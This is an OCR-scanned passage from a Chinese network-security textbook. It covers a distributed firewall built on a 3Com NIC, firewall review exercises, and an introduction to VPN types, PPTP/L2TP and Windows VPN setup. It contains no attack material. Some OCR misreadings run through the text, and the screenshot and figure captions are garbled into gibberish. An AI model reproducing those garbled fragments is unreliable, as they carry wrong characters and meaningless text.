人 能 入 式 网 卡 的 设计 是 嵌入 分 布 式 防火 墙 系统 中 的 重点 。Charles 和 Tom 使 用 的 是 
3Com 公司 生产 的 3CR990 系列 网 卡 ,该 系列 网 卡 的 主要 特点 有 : 支持 以 太 网 /IEEE 802. 3， 
10MB/s 和 100MB/s 数据 传输 率 ; 拥有 处 理 器 (3XP) 和 存储 器 ,可 以 执行 大 量 的 网 络 数据 
包 处 理 运 算 ; 一 个 加 密 芯 片 , 支 持 3DES.DES.MD5 和 SHA-1 加 密 算 法 ,可 以 用 作 IPSec 加 
密 运算 或 普通 的 数据 包 加 密 。 


146 网 络 安全 





随 网 卡 硬件 提供 的 固件 程序 包括 一 个 包 过 滤 引 擎 和 策略 服务 器 管理 接口 。 包 过 滤 引 擎 
根据 IP 包 的 基本 参数 ( 源 地 址 、 目 的 地 址 、 源 端口 、 目 的 端口 .方向 等 ) 过 滤 IP 包 ,也 可 以 禁 
止 网 络 窃听 及 IP 伪造 。 策 略 服务 器 管理 接口 处 理 与 策略 服务 器 的 通信 ,包括 策略 的 下 载 和 
审计 事务 的 发 送 。 具 体 的 软 硬 件 层次 如 图 4. 12 所 示 。 


受 保护 的 主机 EFW 策 略 服务 器 
EFW 助 理 进程 服务 器 管理 前 端 
主机 操作 系统 审计 策略 


网 卡 驱动 和 运行 守护 | 守护 
时 镜像 进程 | ”进程 


Hat 


4.12 ”EFW 网 卡 的 软 硬 件 层次 


图 4.12 中 EFW 助理 进程 是 运行 在 用 户 程序 空间 的 进程 ,主要 用 于 向 EFW 提供 其 工 
作 所 需 的 IP 地 址 等 信息 ,此 外 在 EFW 正常 工作 时 向 服务 器 发 送 心跳 信息 ,报告 自身 状态 ; 
网 卡 驱 动 程序 驱动 网 卡 收发 IP 包 ,并 且 在 系统 启动 时 向 EFW 网 卡 提供 运行 时 镜像 ; 策略 
服务 器 管理 前 端 向 系统 管理 员 提 供 制 定 、 分 发 策略 的 工具 ; 策略 守护 进程 把 策略 编译 成 各 
个 EFW 网 卡 使 用 的 过 滤 规 则 ,并 负责 将 其 分 发 出 去 ; 审计 守护 进程 接收 EFW 网 卡 发 回 的 
审计 事件 。 为 了 保障 安全 ,EFW 和 策略 服务 器 的 通信 需要 经 过 加 密 。 
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4.5 本 章 小 结 


防火 墙 是 一 种 综合 性 的 技术 ,涉及 计算 机 网 络 技术 、 密 码 技术 、 安 全 技术 、 软 件 技术 、 安 
全 协议 、 国 际 标准 化 组 织 (ISO) 的 安全 规范 以 及 安全 操作 系统 等 多 方面 。 防 火 墙 作为 内 部 
网 与 外 部 网 之 间 的 一 种 访问 控制 设备 ,常常 安装 在 内 部 网 和 外 部 网 的 交界 点 上 。 本 章 主要 
从 技术 上 讨论 了 包 过 滤 防 火 墙 ` 双 宿 网 关 防 火 墙 和 屏蔽 子 网 防火 墙 。Internet 防火 墙 不 仅 
是 路 由 器 、 堡 又 主机 或 任何 提供 网 络 安全 的 设备 的 组 合 , 更 是 安全 策略 的 一 个 部 分 。 安 全 策 
略 建立 了 全 方位 的 防御 体系 来 保护 机 构 的 信息 资源 。 安 全 策略 应 告诉 用 户 应 有 的 责任 , 公 
司 规定 的 网 络 访问 、 服 务 访问 .本 地 和 远 地 的 用 户 认证 、 拨 入 和 拨 出 、 磁 盘 和 数据 加 密 、 病 毒 
防护 措施 ,以 及 雇员 培训 等 。 所 有 可 能 受到 网 络 攻击 的 地 方 都 必须 以 同样 的 安全 级 别 加 以 
保护 。 仅 设立 防火 墙 系统 ,而 没有 全 面 的 安全 策略 ,那么 防火 墙 就 形同虚设 。 


4.6 本 章 习 题 


1. 举例 说 明 自 主 访问 控制 ,强制 访问 控制 .基于 角色 的 访问 控制 3 种 技术 的 应 用 场合 。 
2. 目前 市 面 上 有 很 多 个 人 防火 墙 , 这 些 个 人 防火 墙 是 否 存在 安全 缺陷 ? 
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.防火墙 有 哪 两 种 基本 策略 ? 简 述 两 种 策略 的 适用 场景 。 

. 防火 墙 能 否 保 证 内 部 网 络 的 绝对 安全 ? 试 说 明 你 的 观点 。 

. 包 过 滤 防 火 墙 工作 于 OSI 模 型 的 哪 一 层 ? 检测 IP 数据 包 的 哪些 部 分 ? 
. 试 比 较 包 过 滤 技 术 与 Sniffer 的 异同 点 。 

. 与 双 宿 网 关 防 火 墙 相 比 ,屏蔽 子 网 防火 墙 有 哪些 特点 ? 

.比较 应 用 层 代 理 \ 传 输 层 代理 和 SOCKS 代理 的 异同 点 。 

. 简 述 分 布 式 防火 墙 的 工作 原理 及 其 优势 。 

10. 查阅 有 关 资 料 , 讨 论 当前 防火 墙 的 最 新 发 展 状况 。 


‘oT 人 ww 
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防火 墙 可 以 对 进出 网 络 的 信息 和 行为 进行 控制 ,将 用 户 内 部 可 信任 网 络 与 外 部 不 可 信 
任 网 络 隔离 。 然 而 , 越 来 越 多 的 企业 在 全 国 乃 至 世界 各 地 建立 了 分 支 机 构 开 展业 务 。 随 着 
办 公 场 地 和 分 支 机 构 的 分 散 化 以 及 日 渐 庞 大 的 移动 办 公 大 军 的 出 现 ,分 散在 不 同 地 点 的 机 
构 也 需要 考虑 安全 传输 问题 。 虚 拟 私 有 网 (Virtual Private Network,VPN) 技 术 应 运 而 生 ， 
既 可 以 实现 企业 网 络 的 全 球 化 ,又 能 最 大 限度 地 利用 公共 资源 。 

本 章 主要 内 容 : 

。 VPN 概述 

。 VPN 连接 的 类 型 

。 数据 链 路 层 VPN 协议 

。 网 络 层 VPN 协议 
传输 层 VPN 协议 
。 会 话 层 VPN 协议 


5.1 VPN 概述 


局 域 网 一 般 由 某 个 企业 拥有 并 管理 ,可 以 通过 防火 墙 设置 统一 的 安全 管理 策略 。 因 此 ， 
相对 于 开放 的 Internet, 在 局 域 网 传输 企业 内 部 机 密 信息 具有 和 较 高 的 安全 性 。 

随 着 经 济 全 球 化 进程 的 日 益 加 快 ,虚拟 私有 网 技术 应 运 而 生 。 有 了 VPN ,移动 用户 在 
路 途中 也 可 以 利用 Internet 或 其 他 公共 网 络 对 内 部 服务 器 进行 远程 访问 。 从 用 户 的 角度 来 
看 ,VPN 就 是 在 用 户 计算 机 即 VPN 客户 机 和 VPN 服务 器 之 间 建 立 点 到 点 的 连接 ,由 于 数 
据 通 过 一 条 仿真 专线 传输 ,用 户 感觉 不 到 公共 网 络 的 实际 存在 ,能够 像 在 专线 上 一 样 处 理 内 
部 信息 。 因 此 ,虚拟 专用 网 不 是 真正 的 专用 网 络 , 但 能 够 实现 专用 网 络 的 功能 。 


5.1.1 VPN 的 概念 


当 一 个 机 构 在 多 个 地 点 都 存在 着 分 支 机 构 , 并 且 相 互 之 间 经 常 需 要 通过 Internet 传输 
机 密 信息 时 , 当 员 工 出 差 在 外 ,需要 通过 Internet 访问 公司 内 部 网 络 的 保密 数据 时 ,如 何 才 
能 保证 数据 在 传输 过 程 中 的 不 被 窃听 不 被 算 改 、 不 会 丢失 呢 ? 

一 种 方法 是 建立 自己 的 私有 网 ,即将 不 同 地 区 的 各 个 局 域 网 直接 用 光纤 专线 连接 ,局 域 
网 和 专线 使 用 权 完 全 属于 本 企业 ,有 和 较 高 的 安全 性 。 但 这 种 方法 在 我 国难 以 实施 ,因为 企业 
没有 路 权 , 不 能 开 挖 道路 ,私自 铺设 通信 和 电缆 或 光缆 ; 二 则 架设 专线 非常 昂贵 ,例如 ,我 国 铁 
路 企业 沿 铁轨 两 侧 有 一 定 范围 的 路 权 , 因 此 可 以 铺设 铁路 通信 专线 , 即 现在 铁通 网 络 的 前 
身 , 但 其 专 网 的 耗资 达 600 余 亿 元 人 民 币 。 显 然 ,这 对 于 绝 大 多 数 企 业 来 说 并 不 现实 。 

另 一 种 方法 是 通过 私有 隧道 技术 在 公共 网 络 上 仿真 一 条 点 到 点 专线 ,从 而 达到 信息 安 
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全 传输 的 目的 ,这 就 是 VPN。VPN 在 公共 网 络 中 传递 只 有 内 部 网 关 才 能 解密 的 加 密 信息 ， 
从 而 在 不 同 地 区 内 部 网 的 网 关 处 都 形成 一 条 端 到 端的 加 密 隧 道 , 这 样 不 用 实际 铺设 专线 ,也 
可 以 实现 在 全 球 范围 内 将 内 部 网 络 连通 并 保证 传输 安全 的 目的 。 因 此 ,VPN 既 可 以 实现 企 
业 网 络 的 全 球 化 ,又 能 最 大 限度 地 利用 公共 资源 。 

借助 VPN 技术 ,使 出 差 的 员工 在 途中 也 可 以 利用 Internet 或 其 他 公共 网 络 远程 访问 企 
业 局 域 网 内 部 的 服务 器 。 从 用 户 的 角度 来 看 ,VPN 就 是 用 户 计算 机 ( 即 VPN 客户 机 ) 和 
VPN 服务 器 之 间 点 到 点 的 连接 ,由 于 数据 通过 一 条 仿真 专线 传输 ,用 户 感 觉 不 到 公共 网 络 
的 实际 存在 ,能 够 像 在 专线 上 一 样 处 理 内 部 信息 。 因 此 ,虚拟 专用 网 虽然 不 是 真正 的 专用 网 
络 , 却 能 够 实现 专用 网 络 的 功能 。 与 长 途 拨号 及 长 途 专线 服务 相 比 ,使 用 VPN 只 需要 本 地 
ISP(Internet Service Provider, 互 联网 服务 提供 商 ) 提 供 正 常 的 Internet 接 人 服务 ,其 成 本 
也 低廉 得 多 。 


5.1.2 VPN 的 组 成 与 功能 


典型 VPN 的 组 成 如 图 5.1 所 示 。 在 图 中 ,移动 用 户 通 过 本 地 网 络 服务 器 提供 者 连接 
Internet, 并 通过 企业 内 部 VPN 服务 器 认证 后 ,可 以 建立 一 条 跨越 Internet 的 安全 连接 , 实 
现 与 其 他 地 区 企业 内 部 网 络 之 间 的 安全 通信 。 






内 部 网 络 


公共 网 络 本 


(如 Internet) VPN 客户 机 
(如 移动 用 户 ) 


5.1 VPN 的 构成 


VPN 的 主要 功能 如 下 : 

。 数据 封装 。VPN 技术 提供 带 寻 址 报头 的 数据 封装 机 制 。 

。 认证 。VPN 连接 中 包括 两 种 认证 方式 一 一 单 向 认证 和 双向 认证 。 单 向 认证 是 指 在 
VPN 连接 建立 之 前 ,VPN 服务 器 对 请 求 建立 连接 的 VPN 客户 机 进行 身份 验证 , 核 
查 其 是 否 为 合法 的 授权 用 户 。 如 果 使 用 双向 验证 ,还 需 进 行 VPN 客户 机 对 VPN 
服务 器 的 身份 验证 ,以 防止 伪装 的 非法 服务 器 提供 错误 信息 。 

。 数据 完整 性 和 合法 性 认证 。 检 查 链 路 上 传输 的 数据 是 否 出 自 源 端 以 及 在 传输 过 程 
中 是 否 经 过 算 改 。VPN 链 路 中 传输 的 数据 包含 密码 检查 , 密 钥 只 由 发 送 者 和 接收 
者 双方 共享 。 

。 数据 加 密 。 数 据 由 发 送 者 加 密 , 接 收 者 解密 ,以 确保 其 在 公共 网 络 上 的 传输 安全 。 
加 解密 过 程 要 求 发 送 方 和 接收 方 共 享 密 钥 。 
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如 果 不 掌握 密 钥 ,即使 数据 包 被 截取 ,也 难以 识别 。 密 钥 长 度 是 一 个 重要 的 安全 参数 。 
密 钥 通常 可 以 由 多 种 加 密 算法 综合 而 成 。 随 着 密 钥 长 度 的 增 大 ,破解 的 难度 也 相应 增 大 , 因 
此 使 用 最 大 可 能 长 度 的 密 钥 对 于 确保 数据 安全 是 非常 关键 的 。 

同一 种 密 钥 不 能 长 期 使 用 ,必须 定期 更 换 , 因 为 使 用 同一 种 密 钥 加 密 的 信息 量 越 大 , 破 
解 也 就 越 容 易 。 因 此 常常 有 必要 选择 在 一 次 连接 中 配置 使 用 不 同 的 密 钥 。 


s.1.3 隧道 技术 


VPN 技术 可 以 在 多 个 层次 上 实现 ,其 核心 是 采用 隧道 技术 ,在 公共 网 络 中 将 用 户 的 数 
据 封装 在 隧道 里 进行 传输 。 隧 道 技 术 与 接 入 方式 无 关 , 可 以 支持 各 种 形式 的 接 入 ,如 拨号 、 
Cable Modem、xDSL、ISDN 、 专 线 其 至 无 线 接 入 等 。 隧 道 协 议 一 般 包括 以 下 几 个 方面 : 

。 乘客 协议 。 即 被 封装 的 协议 ,如 PPP、Ethernet 等 。 

。 封装 协议 。 负 责 隧 道 的 建立 、 维 持 和 断 开 ,如 L2TP、.PPTP、.GRE、IPSec 等 。 

。 承载 协议 。 承 载 经 过 封装 后 的 数据 包 的 协议 ,如 IP.ATM 等 。 

互联 网 上 最 常见 的 隧道 协议 主要 有 第 二 层 隧道 协议 和 第 三 层 隧道 协议 ,区 别 主要 在 于 
用 户 数 据 在 网 络 协议 栈 的 第 几 层 被 封装 。 

。 第 二 层 隧 道 协议 ,如 PPTP/ L2TP, 主 要 用 于 实现 拨号 VPN 业务 。 

。 第 三 层 隧道 协议 ,如 IPSec 等 ,主要 用 于 实现 专线 VPN 业务 。 

本 章 后 面 将 详细 介绍 各 个 层次 的 VPN 协议 。 

表 5. 1 分 别 以 ISO /OSI 参考 模型 和 TCP/IP 参考 模型 为 参照 ,对 应 列 出 了 各 种 VPN 
技术 所 属 的 层次 。 


表 5.1 VPN 技术 的 实现 层次 





OSI/ISO 参考 模型 VPN 技术 协议 TCP/IP 参考 模型 
会 话 层 SOCKS v5 
传输 层 SSL 传输 层 
网 络 层 IPSec,MPLS,GRE 网 络 层 
数据 链 路 层 PPTP,L2TP 数据 链 路 层 


5.1.4 VPN 管理 


如 同 任何 其 他 的 网 络 资源 一 样 ,VPN 也 必须 得 到 有 效 的 管理 。 对 VPN 的 管理 可 以 从 
以 下 几 方 面 加 以 考虑 : 

。 用 户 管理 。 用 户 账号 信息 存储 在 哪里 ? 

。 地 址 和 域名 服务 器 的 管理 。 如 何 分 配 VPN 客户 机 的 IP 地 址 ? 

。 认证 管理 。VPN 服务 器 如 何 对 试图 建立 VPN 连接 的 用 户 进行 身份 认证 ? 

。 日 志 管理 。VPN 服务 器 如 何 记录 VPN 活动 ? 

。 网 络 管理 。 如 何 运 用 标准 网 络 管理 协议 (如 SNMP) 对 VPN 服务 器 进行 管理 ? 

1. 用 户 管 理 

一 般 说 来 ,不 允许 同一 个 用 户 同 一 时 刻 在 不 同 的 服务 器 上 拥有 各 自 不 同 的 用 户 账 号 。 
为 此 ,大 多 数 VPN 网 络 管理 的 做 法 是 在 主 域 控 制 器 (Primary Domain Controller, PDC) 或 
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远程 认证 拨 入 用 户 服务 (RADIUS) 服 务 器 上 建立 主 账 户 数据 库 ,以 便 VPN 服务 器 对 某 中心 
认证 设备 发 送 认 证 信任 状 。 同 一 个 用 户 账号 既 可 用 于 拨 入 远程 访问 ,也 可 用 于 基于 VPN 
的 远程 访问 。 

2. 地 址 和 域名 服务 器 的 管理 

VPN 服务 器 必须 有 可 供 使 用 的 IP 地 址 ,以 便 在 连接 建立 过 程 中 的 IP 控制 协议 协商 阶 
段 将 这 些 IP 地 址 分 配给 VPN 服务 器 的 虚拟 接口 和 VPN 客户 机 。 分 配给 VPN 客户 机 的 
IP 地 址 即 分 配给 VPN 客户 机 虚拟 接口 的 IP 地 址 。VPN 服务 器 还 必须 配置 DNS 和 WINS 
地 址 ,并 在 协商 时 将 这 些 地 址 赋 给 VPN 客户 机 。 

3. 认证 管理 

VPN 服务 器 在 配置 时 可 选择 Windows 或 者 RADIUS 提供 认证 。 如 果 选 择 Windows， 
则 由 Windows 认证 机 制 来 对 企图 建立 VPN 连接 的 用 户 进 行 身份 验证 。 如 果 选 择 
RADIUS, 则 用 户 发 出 的 连接 请 求 和 身份 参数 将 作为 一 系列 请 求 消息 流 发 送 至 RADIUS 服 
务 器 。 

RADIUS 服务 器 接收 到 来 自 VPN 服务 器 的 用 户 连接 请 求 后 ,利用 它 的 认证 数据 库 验 
证 用 户 身 份 。 另 外 RADIUS 服务 器 上 通常 还 备 有 一 个 记录 用 户 其 他 特性 的 数据 库 。 这 样 ， 
对 于 认证 请 求 ,RADIUS 服务 器 除了 作出 是 与 否 的 判断 外 ,还 可 向 VPN 服务 器 提供 该 用 户 
的 其 他 连接 参数 ,诸如 允许 的 最 大 连接 时 间 和 静态 IP 地 址 等 。 

RADIUS 服务 器 对 认证 请 求 作 出 的 回应 既 可 以 基于 它 自己 的 数据 库 , 也 可 以 通过 
ODBC 访问 其 他 数据 库 实现 。 此 外 ,RADIUS 服务 器 还 可 作为 客户 代理 对 远程 RADIUS 服 
务 器 进行 访问 。 

4. 日 志 管理 

VPN 服务 器 在 配置 时 可 选择 Windows 或 者 RADIUS 提供 记 账 管理 。 如 果 选 择 
Windows, 则 账目 信息 累积 在 VPN 服务 器 上 以 供 日 后 分 析 。 如 果 选 择 RADIUS,RADIUS 
账目 信息 将 发 送 至 RADIUS 服务 器 以 供 累 积 和 分 析 。 

大 多 数 RADIUS 服务 器 可 以 配置 成 将 认证 请 求 记录 写 进 记 账 文件 中 。 有 不 少 第 三 方 
软件 商 提供 记 账 和 审核 软件 包 功 能 ,可 以 分 析 RADIUS 账目 记录 ,然后 生成 各 种 报表 。 

5. 网 络 管理 


假定 安装 有 简单 网 络 管理 协议 (SNMP) ,那么 在 SNMP 环境 中 ,VPN 服务 器 可 作为 
SNMP 代理 ,将 管理 信息 记录 在 MIB 开 的 对 象 标识 中 ,并 通过 专用 的 网 络 管理 软件 进行 监 
控 、 管 理 。 


5.2 VPN 连接 的 类 型 


按照 不 同 的 用 途 ,虚拟 专用 网 可 以 分 为 3 类: 

。 内 联网 VPN。 在 机 构 的 各 个 分 支 机 构 之 间 建 立 的 虚拟 专用 网 称 为 内 联网 虚拟 专 
用 网 。 

远程 访问 VPN。 在 分 支 机 构 与 远 地 员 工 等 移动 用 户 之 间 建 立 的 虚拟 专用 网 称 为 远 
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程 访问 虚拟 专用 网 。 


。 外 联网 VPN。 在 某 个 机 构 与 其 他 相关 业务 单位 、 合 作 伙 伴 等 之 间 建 立 的 虚拟 专用 
网 称 为 外 联网 虚拟 专用 网 。 


5.2.1 内 联网 虚拟 专用 网 


内 联网 虚拟 专用 网 是 通过 公共 网 络 ( 如 Internet) 将 一 个 组 织 的 各 分 支 机 构 的 局 域 网 连 
接 而 成 的 网 络 。 这 种 类 型 的 局 域 网 到 局 域 网 的 连接 带 来 的 风险 最 小 ,一 个 机 构 通常 认为 他 
们 自己 的 分 支 机 构 是 可 信 的 ,这 种 方式 连接 而 成 的 虚拟 专用 网 称 为 内 联网 虚拟 专用 网 ,可 把 
它 作 为 企业 的 中 心 网 络 进一步 扩展 。 如 图 5. 2 所 示 ,两 个 局 域 网 分 别 设 置 了 VPN 服务 器 ， 
VPN 服务 器 之 间 形 成 信息 传输 隧道 ,保证 在 隧道 中 传输 信息 的 机 密 性 。 


TD 


分 支 机 构 
局 域 网 






VPN 服务 器 


Internet 
VPN 服务 器 二 


中 心 局 域 网 
图 5.2 内 联网 虚拟 专用 网 连接 示意 图 


采用 这 种 类 型 的 虚拟 专用 网 能 够 有 效 地 保证 重要 数据 流 经 Internet 时 的 安全 性 , 即 中 
心 局 域 网 和 各 分 支 机 构 局 域 网 能 够 进行 安全 的 通信 。 

VPN 服务 器 的 主要 功能 如 下 : 

。 认证 用 户 的 身份 。 保 证 只 有 合法 用 户 才 能 通过 VPN 隧道 进行 数据 访问 。 

。 信息 加 密 。VPN 服务 器 之 间 形 成 加 密 隧 道 ,保证 信息 传输 的 机 密 性 。 


5.2.2 远程 访问 虚拟 专用 网 


传统 情况 下 ,远程 访问 用 户 ( 如 在 外 出 差 的 员工 ) 必 须 使 用 长 途 拨号 ,通过 内 部 局 域 网 的 

访问 服务 器 进入 内 部 网 络 进行 访问 ,这 种 方法 存在 较 大 的 缺陷 

。 必须 使 用 长 途 电话 ,费用 较 贵 ,并 且 使 用 不 方便 。 

。 绕 开 了 防火 墙 的 控制 , 留 下 安全 隐患 。 内 部 的 服务 器 还 必须 增加 拨号 访问 内 部 网 的 
方式 ,这 与 防火 墙 作 为 内 部 网 和 外 部 网 之 间 唯 一 关口 的 思路 相 违背 . 极 易 产生 安全 
问题 。 

远程 访问 虚拟 专用 网 则 首先 由 远程 用 户 通过 其 当地 的 ISP 连接 到 Internet, 然 后 再 通 

过 Internet 访问 内 部 局 域 网 。 这 种 基于 Internet 的 VPN 连接 充分 利用 了 Internet 的 全 球 
连接 性 ,为 远程 用 户 免 去 了 高 昂 的 长 途 费 用 ,并 具有 较 好 的 安全 性 ,连接 示意 图 如 图 5. 3 
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所 示 。 





内 部 网 络 
图 5.3 远程 访问 虚拟 专用 网 连接 示意 图 


远程 用 户 利用 本 地 ISP 提供 的 VPN 服务 启动 一 条 VPN 连接 ,然后 通过 Internet 与 
VPN 服务 器 相连 ,从 而 实现 远程 用 户 和 内 部 网 络 之 间 安 全 的 信息 交互 。 这 种 方式 尤其 适用 
于 移动 用 户 。 

在 Windows 2000 之 前 的 操作 系统 没有 内 置 VPN 端 ,需要 采用 专门 的 VPN 客户 端 软 
件 , 如 FortiClient 等 。 图 5.4 是 在 FortiClient 中 建立 的 3 个 VPN 入 口 ,其 中 名 称 为 taxi 的 
VPN 已 经 连接 成 功 ,处 于 启动 状态 。 























测试 中 疡 注 接 增加 | 名 每 台 障 重 命名 

















5.4 VPN 客户 端 连接 示意 图 


5.2.3 外 联网 虚拟 专用 网 


外 联网 虚拟 专用 网 为 企业 机 构 的 合作 伙伴 、 相 关 职 能 单位 的 网 络 连接 提供 安全 性 ,如 
图 5.5 所 示 。 
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Intranet A 


Internet 







VPN 服 务 器 


5.5 外 联网 虚拟 专用 网 连接 示意 图 


外 联网 虚拟 专用 网 应 能 保证 包括 TCP 和 UDP 服务 在 内 的 各 种 应 用 服务 的 安全 ,例如 
E-mail.HTTP、FTP、Real Audio、 数 据 库 的 安全 以 及 一 些 应 用 程序 如 Java、Active X 的 安 
全 。 因 为 不 同系 统 的 网 络 环境 可 能 不 同 , 外 联网 虚拟 专用 网 方案 应 能 适用 于 各 种 操作 平台 、 
协议 、 各 种 不 同 的 认证 方案 及 加 密 算法 。 

外 联网 虚拟 专用 网 的 主要 目标 是 保证 数据 在 传输 过 程 中 不 被 修改 ,保护 网 络 资源 不 受 
外 部 威胁 。 安 全 的 外 联网 虚拟 专用 网 要 求 系 统 在 同 它 的 合作 伙伴 、 相 关 职 能 单位 之 间 经 
Internet 建立 端 到 端的 连接 时 必须 通过 虚拟 专用 网 服务 器 才能 进行 。 在 这 种 系统 中 ,网 络 
管理 员 可 以 为 合作 伙伴 的 职员 指定 特定 的 许可 权 , 例 如 可 以 允许 对 方 的 一 定 级 别 的 管理 人 
员 访 问 一 个 受到 保护 的 服务 器 上 的 文件 等 。 

外 联网 虚拟 专用 网 是 一 个 由 加 密 、 认 证 和 访问 控制 功能 组 成 的 集成 系统 。 通 常 ,将 虚拟 
专用 网 代理 服务 器 放 在 一 个 不 能 穿 透 的 防火 墙 隔 离 层 之 后 ,防火墙 阻止 所 有 来 历 不 明 的 信 
息 传输 。 所 有 过 滤 后 的 数据 通过 唯一 的 入 口传 到 虚拟 专用 网 服务 器 ,虚拟 专用 网 服务 器 再 
根据 安全 策略 进一步 过 滤 。 

虚拟 专用 网 可 以 建立 在 网 络 协 议 的 上 层 , 如 应 用 层 ; 也 可 建立 在 较 低 的 层次 ,如 网 络 
层 。 应 用 层 的 虚拟 专用 网 可 以 用 代理 服务 器 实现 , 即 不 直接 打开 任何 到 内 部 网 的 连接 ,从 而 
防止 IP 地 址 欺骗 。 所 有 访问 都 要 经 过 代理 ,管理 员 就 可 以 知道 谁 曾 企图 访问 内 部 网 以 及 作 
了 多 少 次 尝试 。 

外 联网 虚拟 专用 网 并 不 假定 连接 的 不 同 企业 的 系统 之 间 存 在 双向 信任 关系 。 外 联网 虚 
拟 专用 网 在 Internet 内 打开 一 条 隧道 ,并 保证 经 包 过 滤 后 信息 传输 的 安全 。 一 个 外 联网 虚 
拟 专用 网 应 该 用 高 强度 的 加 密 算法 , 密 钥 应 尽 可 能 的 长 。 此 外 应 支持 多 种 认证 方案 和 加 密 
算法 ,因为 其 他 系统 可 能 有 不 同 的 网 络 结构 和 操作 平台 。 

外 联网 虚拟 专用 网 应 能 根据 尽 可 能 多 的 参数 来 控制 对 网 络 资源 的 访问 ,参数 包括 源 地 
址 、 目 的 地 址 、 应 用 程序 的 用 途 、 所 用 的 加 密 和 认证 类 型 .个 人 身份 .工作 组 、 子 网 等 。 管 理 员 
应 能 对 个 人 用 户 进 行 身份 认证 ,而 不 仅仅 根据 IP 地 址 。 
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s.3 数据 链 路 层 VPN 协议 


数据 链 路 层 VPN 安全 协议 主要 包括 点 对 点 隧道 协议 (Point-to-Point Tunneling 
Protocol, PPTP) 和 第 二 层 隧 道 协议 (Layer 2 Tunneling Protocol,L2TP) ,它们 是 IPSec 出 
现 前 最 主要 的 VPN 类 型 ,至 今 仍 然 被 广泛 使 用 ,通常 用 于 支持 拨号 用 户 远程 接 人 企业 或 机 
构 的 内 部 VPN 服务 器 。 


5.3.1 PPTP 与 L2TP 简介 


点 对 点 隧道 协议 是 一 种 支持 多 协议 虚拟 专用 网 的 网 络 技术 , 它 可 以 使 远程 用 户 通过 
Internet 安全 地 访问 用 户 内 部 网 。 通 过 点 对 点 隧道 协议 ,远程 用 户 可 以 通过 Windows XP、 
Windows Vista 等 操作 系统 以 及 其 他 支持 点 对 点 协议 (Point-to-Point Protocol, PPP) 的 系 
统 拨号 连接 到 Internet 服务 提供 商 ,再 通过 Internet 与 其 内 部 网 连接 。 

PPTP 工作 在 OSI 模型 的 第 二 层 ( 数 据 链 路 层 ), 它 在 所 有 通信 流 之 上 简单 地 建立 了 一 
条 加 密 隧道 。PPTP 已 被 蔡 入 到 Windows 98 以 后 的 各 种 微软 操作 系统 中 ,用 于 路 由 和 远程 
访问 服务 。 

除 微软 公司 外 , 男 有 一 些 厂家 也 做 了 许多 开发 工作 ,如 Cisco 公司 开发 的 L2F(Layer2 
Forwarding) 隧 道 协议 。 

微软 .Cisco、Ascend、3Com、Bay 等 厂商 将 L2F 与 PPTP 融合 ,产生 了 第 二 层 隧道 协议 ， 
并 于 1999 年 8 月 公布 了 L2TP 的 标准 一 一 RFC 2661。L2TP 和 PPTP 十 分 相似 , L2TP 部 
分 采用 了 PPTP 协议 ,两 个 协议 都 允许 客户 通过 公 网 建立 安全 隧道 。L2TP 还 支持 信道 认 
证 ,但 它 没有 规定 信道 保护 的 方法 。 

PPTP/L2TP 的 最 大 优点 是 简单 易 行 ,具体 如 下 : 

。 PPTP/L2TP 对 使 用 微软 操作 系统 的 用 户 来 说 很 方便 ,因为 微软 公司 已 把 它 作 为 路 

由 软件 的 一 部 分 。 
。 PPTP/L2TP 位 于 数据 链 路 层 , 包 括 IPv4 在 内 的 多 个 网 络 协议 可 以 采用 它们 作为 链 
路 协议 ,支持 流量 控制 。 

。 PPTP/L2TP 通过 减少 丢 包 来 减少 重 传 , 改 善 网 络 性 能 。 

PPTP/L2TP 的 缺点 如 下 : 

。 PPTP 和 L2TP 对 PPP 协议 本 身 并 没有 做 任何 修改 ,只 是 将 用 户 的 PPP 帧 基于 

GRE 封装 成 IP 报 文 。 在 两 台 计算 机 之 间 创 建 和 打开 数据 通道 ,一 旦 通道 打开 , 源 
和 目的 用 户 身 份 就 不 再 需要 验证 ,这 样 可 能 带 来 问题 。 

。 PPTP/L2TP 不 对 两 个 节点 间 的 信息 传输 进行 监视 或 控制 。 

。 PPTP 和 L2TP 限制 同时 最 多 只 能 连接 255 个 用 户 , 可 扩展 性 不 强 , 且 不 适合 于 向 
IPv6 的 转移 。 

端 用 户 需 要 在 连接 前 手工 建立 加 密 信道 。 
没有 提供 内 在 的 安全 机 制 , 认 证 和 加 密 受 到 限制 ,没有 强加 密 和 认证 支持 。 
不 支持 企业 与 外 部 客户 以 及 供应 商 之 间 会 话 的 保密 性 需求 ,不 支持 外 联网 VPN。 
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安全 程度 差 是 PPTP/L2TP 最 大 的 弱点 。 因 此 ,PPTP 和 L2TP 最 适合 用 于 客户 远程 
访问 虚拟 专用 网 ,而 对 于 安全 要 求 高 的 内 部 信息 ,用 PPTP/L2TP 传输 与 用 明文 传输 的 差别 
并 不 大 。 


5.3.2 VPN 的 配置 


随 着 使 用 VPN 服务 的 用 户 稳定 增加 ,微软 公司 自 Windows 2000 起 ,已 经 将 其 功能 集 
成 到 操作 系统 内 。 在 “网 络 连接 ”对 话 框 中 选择 “创建 一 个 新 的 连接 ”, 出 现 如 图 5.6 所 示 的 
界面 ,选择 “连接 到 我 的 工作 场所 的 网 络 ”, 然 后 根据 提示 ,依次 完成 图 5.7 至 图 5. 10 的 各 个 
步骤 。 


网 络 连接 类 型 A 
您 想 做 什么 ? ) 


口 连 接 到 Internet CC) 
连接 到 Internet， 这样 您 就 可 以 浏览 Web 或 阅读 电子 邮件 。 


名 连 撞 到 我 的 工作 场所 的 网 络 (0 
江 列 个 商 业 隐 结 (使 用 搜 呈 或 VPW) ,这 习作 就 可 以 在 家 里 或者 其 它 地 


口 设置 家 庭 或 小 型 办 公 网 络 (5) 
连接 到 | 一 个 现 有 的 家 庭 或 小 型 办 公 网 络 ， 或 者 设置 一 个 新 的 。 


吕 设置 高 级 连接 到 ) 
有 Ti 或 设置 此 计算 机 使 其 它 
计算 机 能 与 它 连接 。 





《上 一步 @) 儿 一 步 中 取消 





图 5.6 选择 新 建 连接 的 类 型 


网 络 连接 
您 想 要 在 工作 点 如 何 与 网 络 连 接 ? ) 


创建 下 列 连 接 : 


口技 号 连接 @) 
人 +， 或 通过 综合 业务 数字 网 CSDND) 电 话 线 连 


使 用 庶 拟 专用 网 络 WP 通过 Internet 连接 到 网 络 。 





[区 上- 步 @)j[E- 和 步 四 让 [取消 ] 








图 5.7 选择 用 VPN 连接 
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新 建 连 插 向 导 


连接 名 
指定 连接 到 | 弥 的 工作 场所 的 连接 名 称 . 


在 下 面 框 中 输入 此 连接 的 名 称 。 
公司 和 名册 
AA 


例如 ,您 可 以 输入 悠 的 工作 地 点 名 或 您 连接 到 的 服务 器 各。 





